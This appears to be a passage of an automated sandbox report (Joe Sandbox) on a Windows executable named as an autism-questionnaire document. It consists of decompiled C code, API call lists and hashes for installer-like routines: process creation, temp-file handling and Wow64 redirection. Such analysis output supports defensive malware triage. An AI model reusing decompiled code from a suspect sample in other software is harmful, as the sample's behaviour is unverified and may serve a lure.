                                                                                              								 *(_t70 + 4) = _t96;
                                                                                              								 *_t96 = _t70;
                                                                                              								 *0x4bbae8 = 0;
                                                                                              								_t71 = VirtualFree(_t108, 0, 0x8000);
                                                                                              								__eflags = _t71 - 1;
                                                                                              								asm("sbb eax, eax");
                                                                                              								return _t71;
                                                                                              							}
                                                                                              						} else {
                                                                                              							 *(_t106 - 4) = _t81 + 3;
                                                                                              							 *(_t106 - 8 + _t81) = _t81;
                                                                                              							E00403B00(_t106, _t88, _t81);
                                                                                              							 *0x4bbae8 = 0;
                                                                                              							__eflags = 0;
                                                                                              							return 0;
                                                                                              						}
                                                                                              					} else {
                                                                                              						__eflags = __eax;
                                                                                              						 *(__edx + 0x10) = __ecx;
                                                                                              						 *(__ecx - 4) = __eax;
                                                                                              						if(__eflags == 0) {
                                                                                              							__ecx =  *(__ebx + 8);
                                                                                              							 *(__edx + 0xc) = __ebx;
                                                                                              							 *(__edx + 8) = __ecx;
                                                                                              							 *(__ecx + 0xc) = __edx;
                                                                                              							 *(__ebx + 8) = __edx;
                                                                                              							 *__ebx = 0;
                                                                                              							__eax = 0;
                                                                                              							__eflags = 0;
                                                                                              							_pop(__ebx);
                                                                                              							return 0;
                                                                                              						} else {
                                                                                              							__eax = 0;
                                                                                              							__eflags = 0;
                                                                                              							 *__ebx = __al;
                                                                                              							_pop(__ebx);
                                                                                              							return 0;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}





























                                                                                              0x0040436d
                                                                                              0x00404370
                                                                                              0x00404372
                                                                                              0x00404374
                                                                                              0x00404375
                                                                                              0x00404377
                                                                                              0x00404328
                                                                                              0x00404328
                                                                                              0x0040432d
                                                                                              0x00404335
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404337
                                                                                              0x00404339
                                                                                              0x00404340
                                                                                              0x00000000
                                                                                              0x00404342
                                                                                              0x00404344
                                                                                              0x00404349
                                                                                              0x0040434e
                                                                                              0x00404356
                                                                                              0x0040435a
                                                                                              0x00000000
                                                                                              0x0040435a
                                                                                              0x00404356
                                                                                              0x00000000
                                                                                              0x00404340
                                                                                              0x00404328
                                                                                              0x00404379
                                                                                              0x00404379
                                                                                              0x00404381
                                                                                              0x00404385
                                                                                              0x004043bc
                                                                                              0x004043bf
                                                                                              0x004043c2
                                                                                              0x004043c4
                                                                                              0x004043ca
                                                                                              0x004043cc
                                                                                              0x004043cc
                                                                                              0x00404387
                                                                                              0x00404387
                                                                                              0x00404387
                                                                                              0x0040438a
                                                                                              0x0040438a
                                                                                              0x0040438e
                                                                                              0x00404392
                                                                                              0x004043d4
                                                                                              0x004043d7
                                                                                              0x004043d9
                                                                                              0x004043db
                                                                                              0x004043e1
                                                                                              0x004043e5
                                                                                              0x004043e5
                                                                                              0x004043e1
                                                                                              0x00404394
                                                                                              0x0040439a
                                                                                              0x004043ec
                                                                                              0x004043f6
                                                                                              0x00404424
                                                                                              0x0040442a
                                                                                              0x0040442f
                                                                                              0x00404436
                                                                                              0x00404440
                                                                                              0x00404446
                                                                                              0x0040444d
                                                                                              0x00404451
                                                                                              0x004043f8
                                                                                              0x004043f8
                                                                                              0x004043fb
                                                                                              0x004043fd
                                                                                              0x00404400
                                                                                              0x00404403
                                                                                              0x00404405
                                                                                              0x00404414
                                                                                              0x00404419
                                                                                              0x0040441c
                                                                                              0x00404420
                                                                                              0x00404420
                                                                                              0x0040439c
                                                                                              0x0040439f
                                                                                              0x004043a2
                                                                                              0x004043aa
                                                                                              0x004043af
                                                                                              0x004043b6
                                                                                              0x004043ba
                                                                                              0x004043ba
                                                                                              0x00404290
                                                                                              0x00404290
                                                                                              0x00404292
                                                                                              0x00404298
                                                                                              0x0040429b
                                                                                              0x004042a4
                                                                                              0x004042a7
                                                                                              0x004042aa
                                                                                              0x004042ad
                                                                                              0x004042b0
                                                                                              0x004042b3
                                                                                              0x004042b6
                                                                                              0x004042b6
                                                                                              0x004042b8
                                                                                              0x004042b9
                                                                                              0x0040429d
                                                                                              0x0040429d
                                                                                              0x0040429d
                                                                                              0x0040429f
                                                                                              0x004042a1
                                                                                              0x004042a2
                                                                                              0x004042a2
                                                                                              0x0040429b
                                                                                              0x0040428e

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                              • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                                              • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                              • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                                              				intOrPtr _t26;
                                                                                              				intOrPtr _t31;
                                                                                              				intOrPtr _t37;
                                                                                              				intOrPtr _t38;
                                                                                              				intOrPtr _t42;
                                                                                              				intOrPtr _t44;
                                                                                              				intOrPtr _t47;
                                                                                              				intOrPtr _t51;
                                                                                              				intOrPtr _t53;
                                                                                              				intOrPtr _t55;
                                                                                              				intOrPtr _t56;
                                                                                              				intOrPtr _t59;
                                                                                              				intOrPtr _t61;
                                                                                              				WCHAR* _t63;
                                                                                              				intOrPtr _t69;
                                                                                              				intOrPtr _t74;
                                                                                              				int _t75;
                                                                                              				intOrPtr _t76;
                                                                                              				intOrPtr _t78;
                                                                                              				struct HWND__* _t81;
                                                                                              				intOrPtr _t82;
                                                                                              				intOrPtr _t86;
                                                                                              				void* _t90;
                                                                                              				intOrPtr _t93;
                                                                                              				intOrPtr _t99;
                                                                                              				intOrPtr _t101;
                                                                                              				intOrPtr _t107;
                                                                                              				intOrPtr _t114;
                                                                                              				intOrPtr _t115;
                                                                                              				intOrPtr _t116;
                                                                                              				intOrPtr _t117;
                                                                                              				void* _t120;
                                                                                              				intOrPtr _t121;
                                                                                              
                                                                                              				_t119 = __esi;
                                                                                              				_t118 = __edi;
                                                                                              				_t85 = __ebx;
                                                                                              				_pop(_t101);
                                                                                              				_pop(_t88);
                                                                                              				 *[fs:eax] = _t101;
                                                                                              				E004AF678(_t88);
                                                                                              				if( *0x4ba440 == 0) {
                                                                                              					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
                                                                                              						_t61 =  *0x4ba674; // 0x4c0d0c
                                                                                              						_t4 = _t61 + 0x2f8; // 0x0
                                                                                              						_t63 = E004084EC( *_t4);
                                                                                              						_t88 = _t120 - 0x28;
                                                                                              						_t101 =  *0x4c1c48; // 0x0
                                                                                              						E00426F08(0xc2, _t120 - 0x28, _t101);
                                                                                              						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
                                                                                              							 *0x4ba44c = 2;
                                                                                              							E0041F238();
                                                                                              						}
                                                                                              					}
                                                                                              					E004056D0();
                                                                                              					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
                                                                                              					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
                                                                                              					_t26 =  *0x4c1d84; // 0x0
                                                                                              					E00422954(_t26, _t88, _t120 - 0x34);
                                                                                              					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
                                                                                              					_push( *((intOrPtr*)(_t120 - 0x30)));
                                                                                              					_t31 =  *0x4c1d94; // 0x0
                                                                                              					E00422660(_t31, _t120 - 0x38);
                                                                                              					_pop(_t90);
                                                                                              					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
                                                                                              					_t107 =  *0x4c1d98; // 0x0
                                                                                              					E00407E00(0x4c1d9c, _t107);
                                                                                              					_t37 =  *0x4c1d90; // 0x4d582c
                                                                                              					_t15 = _t37 + 0x14; // 0x61f9f4f
                                                                                              					_t38 =  *0x4c1d88; // 0x0
                                                                                              					E00423CE8(_t38,  *_t15);
                                                                                              					_push(_t120);
                                                                                              					_push(0x4b63ab);
                                                                                              					_push( *[fs:edx]);
                                                                                              					 *[fs:edx] = _t121;
                                                                                              					 *0x4c1de0 = 0;
                                                                                              					_t42 = E00423D00(1, 0, 1, 0); // executed
                                                                                              					 *0x4c1d8c = _t42;
                                                                                              					_push(_t120);
                                                                                              					_push(0x4b639a);
                                                                                              					_push( *[fs:eax]);
                                                                                              					 *[fs:eax] = _t121;
                                                                                              					_t44 =  *0x4c1d90; // 0x4d582c
                                                                                              					_t16 = _t44 + 0x18; // 0x302c00
                                                                                              					 *0x4c1de0 = E004053F0( *_t16);
                                                                                              					_t47 =  *0x4c1d90; // 0x4d582c
                                                                                              					_t17 = _t47 + 0x18; // 0x302c00
                                                                                              					_t86 =  *0x4c1de0; // 0x7fb50010
                                                                                              					E00405884(_t86,  *_t17);
                                                                                              					_push(_t120);
                                                                                              					_push(0x4b62e9);
                                                                                              					_push( *[fs:eax]);
                                                                                              					 *[fs:eax] = _t121;
                                                                                              					_t51 =  *0x424cd8; // 0x424d30
                                                                                              					_t93 =  *0x4c1d88; // 0x0
                                                                                              					_t53 = E00424748(_t93, 1, _t51); // executed
                                                                                              					 *0x4c1de4 = _t53;
                                                                                              					_push(_t120);
                                                                                              					_push(0x4b62d8);
                                                                                              					_push( *[fs:eax]);
                                                                                              					 *[fs:eax] = _t121;
                                                                                              					_t55 =  *0x4c1d90; // 0x4d582c
                                                                                              					_t18 = _t55 + 0x18; // 0x302c00
                                                                                              					_t56 =  *0x4c1de4; // 0x2230f00
                                                                                              					E00424A24(_t56,  *_t18, _t86);
                                                                                              					_pop(_t114);
                                                                                              					 *[fs:eax] = _t114;
                                                                                              					_push(E004B62DF);
                                                                                              					_t59 =  *0x4c1de4; // 0x2230f00
                                                                                              					return E00405CE8(_t59);
                                                                                              				} else {
                                                                                              					_t69 =  *0x4ba674; // 0x4c0d0c
                                                                                              					_t1 = _t69 + 0x1d0; // 0x0
                                                                                              					E004AFA44( *_t1, __ebx, __edi, __esi);
                                                                                              					 *0x4ba44c = 0;
                                                                                              					_pop(_t115);
                                                                                              					 *[fs:eax] = _t115;
                                                                                              					_push(E004B6554);
                                                                                              					_t74 =  *0x4c1d88; // 0x0
                                                                                              					_t75 = E00405CE8(_t74);
                                                                                              					if( *0x4c1d9c != 0) {
                                                                                              						_t117 =  *0x4c1d9c; // 0x0
                                                                                              						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
                                                                                              					}
                                                                                              					if( *0x4c1d94 != 0) {
                                                                                              						_t82 =  *0x4c1d94; // 0x0
                                                                                              						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
                                                                                              					}
                                                                                              					if( *0x4ba450 != 0) {
                                                                                              						_t81 =  *0x4ba450; // 0x1d025e
                                                                                              						_t75 = DestroyWindow(_t81); // executed
                                                                                              					}
                                                                                              					if( *0x4c1d78 != 0) {
                                                                                              						_t76 =  *0x4c1d78; // 0x0
                                                                                              						_t99 =  *0x4c1d7c; // 0x1
                                                                                              						_t116 =  *0x426bb0; // 0x426bb4
                                                                                              						E00408D08(_t76, _t99, _t116);
                                                                                              						_t78 =  *0x4c1d78; // 0x0
                                                                                              						E0040540C(_t78);
                                                                                              						 *0x4c1d78 = 0;
                                                                                              						return 0;
                                                                                              					}
                                                                                              					return _t75;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                                                • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                              • DestroyWindow.USER32(001D025E,004B6554), ref: 004B6514
                                                                                                • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                                • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                                • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                                              • String ID: ,XM$.tmp$0MB
                                                                                              • API String ID: 3858953238-2140637138
                                                                                              • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                              • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                                              • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                              • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%


                                                                                              C-Code - Quality: 61%
                                                                                              			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                              				char _v8;
                                                                                              				struct _STARTUPINFOW _v76;
                                                                                              				void* _v88;
                                                                                              				void* _v92;
                                                                                              				int _t23;
                                                                                              				intOrPtr _t49;
                                                                                              				DWORD* _t51;
                                                                                              				void* _t56;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_t51 = __ecx;
                                                                                              				_t53 = __edx;
                                                                                              				_t41 = __eax;
                                                                                              				_push(_t56);
                                                                                              				_push(0x4af7ff);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t56 + 0xffffffa8;
                                                                                              				_push(0x4af81c);
                                                                                              				_push(__eax);
                                                                                              				_push(0x4af82c);
                                                                                              				_push(__edx);
                                                                                              				E004087C4( &_v8, __eax, 4, __ecx, __edx);
                                                                                              				E00405884( &_v76, 0x44);
                                                                                              				_v76.cb = 0x44;
                                                                                              				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
                                                                                              				_t58 = _t23;
                                                                                              				if(_t23 == 0) {
                                                                                              					E004AF34C(0x83, _t41, 0, _t53, _t58);
                                                                                              				}
                                                                                              				CloseHandle(_v88);
                                                                                              				do {
                                                                                              					E004AF6FC();
                                                                                              				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
                                                                                              				E004AF6FC();
                                                                                              				GetExitCodeProcess(_v92, _t51); // executed
                                                                                              				CloseHandle(_v92);
                                                                                              				_pop(_t49);
                                                                                              				 *[fs:eax] = _t49;
                                                                                              				_push(0x4af806);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}


                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32 ref: 004AF798
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                              • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                                • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                              • String ID: D
                                                                                              • API String ID: 3356880605-2746444292
                                                                                              • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                              • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                                                              • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                              • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 60%
                                                                                              			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				char _t16;
                                                                                              				intOrPtr _t32;
                                                                                              				intOrPtr _t41;
                                                                                              
                                                                                              				_t27 = __ebx;
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(_t41);
                                                                                              				_push(0x4b5b5a);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t41;
                                                                                              				 *0x4c1124 =  *0x4c1124 - 1;
                                                                                              				if( *0x4c1124 < 0) {
                                                                                              					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
                                                                                              					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
                                                                                              					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
                                                                                              						_t16 = 0;
                                                                                              					} else {
                                                                                              						_t16 = 1;
                                                                                              					}
                                                                                              					 *0x4c1130 = _t16;
                                                                                              					E00422D44( &_v12);
                                                                                              					E00422660(_v12,  &_v8);
                                                                                              					E004086E4( &_v8, L"shell32.dll");
                                                                                              					E00421230(_v8, _t27, 0x8000); // executed
                                                                                              					E004232EC(0x4c783afb,  &_v16);
                                                                                              				}
                                                                                              				_pop(_t32);
                                                                                              				 *[fs:eax] = _t32;
                                                                                              				_push(0x4b5b61);
                                                                                              				return E00407A80( &_v16, 3);
                                                                                              			}










                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                              • API String ID: 1646373207-2130885113
                                                                                              • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                              • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                                                              • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                              • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 68%
                                                                                              			E00403EE8(signed int __eax) {
                                                                                              				signed int __ebx;
                                                                                              				signed int __edi;
                                                                                              				signed int __esi;
                                                                                              				void* _t96;
                                                                                              				void** _t99;
                                                                                              				signed int _t104;
                                                                                              				signed int _t109;
                                                                                              				signed int _t110;
                                                                                              				intOrPtr* _t114;
                                                                                              				void* _t116;
                                                                                              				void* _t121;
                                                                                              				signed int _t125;
                                                                                              				signed int _t129;
                                                                                              				signed int _t131;
                                                                                              				signed int _t132;
                                                                                              				signed int _t133;
                                                                                              				signed int _t134;
                                                                                              				signed int _t135;
                                                                                              				unsigned int _t141;
                                                                                              				signed int _t142;
                                                                                              				void* _t144;
                                                                                              				void* _t147;
                                                                                              				intOrPtr _t148;
                                                                                              				signed int _t150;
                                                                                              				long _t156;
                                                                                              				intOrPtr _t159;
                                                                                              				signed int _t162;
                                                                                              
                                                                                              				_t95 = __eax;
                                                                                              				_t129 =  *0x4bb059; // 0x0
                                                                                              				if(__eax > 0xa2c) {
                                                                                              					__eflags = __eax - 0x40a2c;
                                                                                              					if(__eax > 0x40a2c) {
                                                                                              						_pop(_t120);
                                                                                              						__eflags = __eax;
                                                                                              						if(__eax >= 0) {
                                                                                              							_push(_t120);
                                                                                              							_t162 = __eax;
                                                                                              							_t2 = _t162 + 0x10010; // 0x10110
                                                                                              							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                                                              							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                                                              							_t121 = _t96;
                                                                                              							if(_t121 != 0) {
                                                                                              								_t147 = _t121;
                                                                                              								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                                                              								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                                                              								E00403C48();
                                                                                              								_t99 =  *0x4bdb80; // 0x4bdb7c
                                                                                              								 *_t147 = 0x4bdb7c;
                                                                                              								 *0x4bdb80 = _t121;
                                                                                              								 *(_t147 + 4) = _t99;
                                                                                              								 *_t99 = _t121;
                                                                                              								 *0x4bdb78 = 0;
                                                                                              								_t121 = _t121 + 0x10;
                                                                                              							}
                                                                                              							return _t121;
                                                                                              						} else {
                                                                                              							__eflags = 0;
                                                                                              							return 0;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t67 = _t95 + 0xd3; // 0x1d3
                                                                                              						_t125 = (_t67 & 0xffffff00) + 0x30;
                                                                                              						__eflags = _t129;
                                                                                              						if(__eflags != 0) {
                                                                                              							while(1) {
                                                                                              								asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              								if(__eflags == 0) {
                                                                                              									goto L42;
                                                                                              								}
                                                                                              								asm("pause");
                                                                                              								__eflags =  *0x4bb989;
                                                                                              								if(__eflags != 0) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									Sleep(0);
                                                                                              									asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              									if(__eflags != 0) {
                                                                                              										Sleep(0xa);
                                                                                              										continue;
                                                                                              									}
                                                                                              								}
                                                                                              								goto L42;
                                                                                              							}
                                                                                              						}
                                                                                              						L42:
                                                                                              						_t68 = _t125 - 0xb30; // -2445
                                                                                              						_t141 = _t68;
                                                                                              						_t142 = _t141 >> 0xd;
                                                                                              						_t131 = _t141 >> 8;
                                                                                              						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
                                                                                              						__eflags = 0xffffffff;
                                                                                              						if(0xffffffff == 0) {
                                                                                              							_t132 = _t142;
                                                                                              							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
                                                                                              							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
                                                                                              								_t133 =  *0x4bbaf0; // 0x0
                                                                                              								_t134 = _t133 - _t125;
                                                                                              								__eflags = _t134;
                                                                                              								if(_t134 < 0) {
                                                                                              									_t109 = E00403BCC(_t125);
                                                                                              								} else {
                                                                                              									_t110 =  *0x4bbaec; // 0x2220dd0
                                                                                              									_t109 = _t110 - _t125;
                                                                                              									 *0x4bbaec = _t109;
                                                                                              									 *0x4bbaf0 = _t134;
                                                                                              									 *(_t109 - 4) = _t125 | 0x00000002;
                                                                                              								}
                                                                                              								 *0x4bbae8 = 0;
                                                                                              								return _t109;
                                                                                              							} else {
                                                                                              								asm("bsf edx, eax");
                                                                                              								asm("bsf ecx, eax");
                                                                                              								_t135 = _t132 | _t142 << 0x00000005;
                                                                                              								goto L50;
                                                                                              							}
                                                                                              						} else {
                                                                                              							asm("bsf eax, eax");
                                                                                              							_t135 = _t131 & 0xffffffe0 | _t104;
                                                                                              							L50:
                                                                                              							_push(_t152);
                                                                                              							_push(_t145);
                                                                                              							_t148 = 0x4bbb78 + _t135 * 8;
                                                                                              							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                                                              							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                                                              							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                                                              							 *_t114 = _t148;
                                                                                              							__eflags = _t148 - _t114;
                                                                                              							if(_t148 == _t114) {
                                                                                              								asm("rol eax, cl");
                                                                                              								_t80 = 0x4bbaf8 + _t142 * 4;
                                                                                              								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
                                                                                              								__eflags =  *_t80;
                                                                                              								if( *_t80 == 0) {
                                                                                              									asm("btr [0x4bbaf4], edx");
                                                                                              								}
                                                                                              							}
                                                                                              							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                                                              							_t144 = 0xfffffff0 - _t125;
                                                                                              							__eflags = 0xfffffff0;
                                                                                              							if(0xfffffff0 == 0) {
                                                                                              								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                                                              								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                                                              								__eflags =  *_t89;
                                                                                              							} else {
                                                                                              								_t116 = _t125 + _t159;
                                                                                              								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                                                              								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                                                              								__eflags = 0xfffffff0 - 0xb30;
                                                                                              								if(0xfffffff0 >= 0xb30) {
                                                                                              									E00403B00(_t116, 0xfffffffffffffff3, _t144);
                                                                                              								}
                                                                                              							}
                                                                                              							_t93 = _t125 + 2; // 0x1a5
                                                                                              							 *(_t159 - 4) = _t93;
                                                                                              							 *0x4bbae8 = 0;
                                                                                              							return _t159;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					__eflags = __cl;
                                                                                              					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
                                                                                              					__eax =  *_t6 & 0x000000ff;
